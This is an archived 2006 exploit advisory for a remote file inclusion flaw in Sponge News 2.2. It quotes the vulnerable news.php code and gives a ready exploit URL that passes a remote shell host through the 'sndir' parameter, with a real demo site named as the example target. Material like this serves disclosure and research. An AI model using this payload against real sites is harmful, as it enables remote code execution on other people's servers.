[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Sponge News <= 2.2 (sndir) Remote File Include Vulnerability
# Published : 2006-09-05
# Author : SHiKaA
# Previous Title : C-News <= 1.0.1 (path) Remote File Inclusion Vulnerability
# Next Title : PhpCommander <= 3.0 (upload) Remote Code Execution Exploit


#==============================================================================================
#Sponge News <= v2.2 (sndir) Remote File Inclusion Exploit
#===============================================================================================
#                                                                       
#Critical Level : Dangerous                                             
#                                                                       
#Venedor site : http://rickeeweb.free.fr/spongeweb/       
#                                                                       
#Version : v2.2                                             
#                                                         
#================================================================================================
#Bug in : news.php
#
#Vlu Code :
#--------------------------------
#      ########################
#       # Les variables utiles #
#       ########################
#       $newsdir = "news/";
#       $commentdir = "comments/";
#       $snversion = "2.2";
#       $lastmodif = "Decembre 2002";
#       $scriptdir = $sndir;
#       $page = $current;
#       require $scriptdir."config.php";
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/news.php?sndir=http://SHELLURL.COM?
#
#Example :
#       http://rickeeweb.free.fr/sndemo/
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : SiMooooo KACPER Rgod Timq XoRon MDX Bl@Ck^B1rd
# Special Thx To : Str0ke
==================================================================================================

# www.Syue.com [2006-09-05]